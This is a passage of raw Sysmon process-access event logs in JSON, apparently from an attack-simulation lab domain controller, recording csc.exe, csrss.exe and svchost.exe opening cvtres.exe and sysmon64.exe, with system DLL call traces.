C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-20CD-5F25-0000-0010E7C40700}","SourceProcessId":"4284","SourceThreadId":"3056","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-00100EC90700}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4918,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4919,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-00100EC90700}\r\nTargetProcessId: 4896\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-00100EC90700}","TargetProcessId":"4896","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4920,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4921,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4922,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4923,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4924,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.002","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4925,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.002\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 